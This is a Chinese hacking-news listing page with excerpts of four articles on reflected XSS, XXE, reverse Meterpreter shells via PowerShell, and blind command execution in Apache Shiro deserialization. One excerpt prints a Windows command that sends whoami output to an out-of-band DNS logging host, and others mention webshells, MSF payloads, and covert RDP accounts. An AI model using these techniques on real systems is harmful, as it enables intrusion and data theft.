记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

不常见的xss利用探索

0x01 前言 反射型xss,相对于持久型xss来说比较鸡肋;需要欺骗用户点击构造好的链接,达到窃取cookie,或是进一步CSRF劫持用户操作的目的。若是get型的xss,javascript代码直接在url中,虽然有些怪异,也好歹能用,愿者上钩。但是若js代码是在post数据包,或者是在header里,那就更显得鸡肋了,甚至无法利用。我查阅了大量的资料,有了下面的尝试。 0x02 POST型反射xss 对于post反射型xss,其实已经有比较成熟的利用方法:构造post表单,利用js直接提交。表单构造如下: 将html保存后,诱导被攻击者访问这个html文件,触发如下: 0x03 http头部反射xss 如果xss代码的输入点是在http头部的话,那么利用表单提交的方法就不行。利用ajax异步跨域请求的
发布时间:2016-08-28 20:50 | 阅读:89875 | 评论:0 | 标签:Web安全 CloudEye csrf header的xss http头部反射xss referer头信息xss sel

XXE被提起时我们会想到什么

0x00 XXE(XML实体注入漏洞)顾名思义,漏洞的关键点在于服务器对外部实体的解析。外部实体中可以请求他域资源,所以很多人在漏洞利用时会习惯的把XXE问题转换成SSRF的问题。前几天别人问我一个有趣的问题:Blind XXE和普通XXE本质区别是什么。 仔细想了想觉得难以回答,由于类似于cloudeye的使用DNS泛析和URL请求记录是可以查看命令执行结果的,大家通常不会在意漏洞点程序是否预设了回显或者可以使用报错得到回显。所以找了一些资料,记录一下上面问题的答案和也顺便记录一下XXE漏洞形成的原因。 0x01 首先要搞清楚的是XML外部实体的概念。一般容易误以为外部是自己定义的意思,事实上外部实体是指实体的参数内容不是当前XML定义的而是从其他资源引入的,用SYSTEM和PUBLIC来申明,也就是我们常
发布时间:2016-08-25 15:15 | 阅读:121353 | 评论:0 | 标签:Web安全 Blind XXE CloudEye DNS泛析 sqli ssrf URL请求 XML XML实体注入漏洞

使用Powershell反弹Meterpreter Shell

撸站时难免会遇到一些比较特殊的情况,遇到一个可以执行命令的点(Windows,可连外网),却无法获得回显;这种情况下我通常会用这几种方法去尝试: 使用CloudEye获取命令执行的结果 找Web路径写WebShell 下载一个MSF的Payload直接反弹 某些情况下目标直接对公网开放3389,直接加个账户用完再删… 先说第一种方法, 使用CloudEye获取回显结果: for /F %x in ('whoami') do start http://cmd.xxxxx.dnslog.info/[%x].jpg执行这条命令,会调用默认的浏览器去打开后面的地址,我们可以获取到whoami的命令执行结果。 这里有一点比较坑的情况是如果结果中一行有空格,那这一行空格后面的结果会丢掉。 比如我执行Dir
发布时间:2016-08-16 21:05 | 阅读:103158 | 评论:0 | 标签:Web安全 CloudEye Meterpreter Shell Payload powershell webshell

无回显命令执行PoC编写方法(Apache Shiro Java反序列化)

概要 前段时间Mottoin发布了《Apache Shiro Java 反序列化漏洞分析》的文章 Apache Shiro 是 Apache 软件基金会的顶级项目,在 Java 应用中首选的授权验证、授权、密码学和会话管理框架。 近日 Apache Shiro 的 JIRA 中提到 Shrio 中的 Cookie 管理存在安全问题,在场景合适的情况下,攻击者可以通过控制本地的Cookie 内容导致 Getshell ,最终获取应用服务器控制权限。 今天就讲讲Apache Shiro Java反序列化无回显命令执行PoC编写方法 无回显 命令成功执行与否,无法从web获取到标志性的信息,Java反序列化漏洞即属于该类型。 验证方法 针对无回显的命令执行漏洞,让目标机执行wget、nc或者curl等命令,然后在公网
发布时间:2016-08-14 22:35 | 阅读:148618 | 评论:0 | 标签:Web安全 Apache Shiro CloudEye Java反序列化 Payload poc seebug 无回显命

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词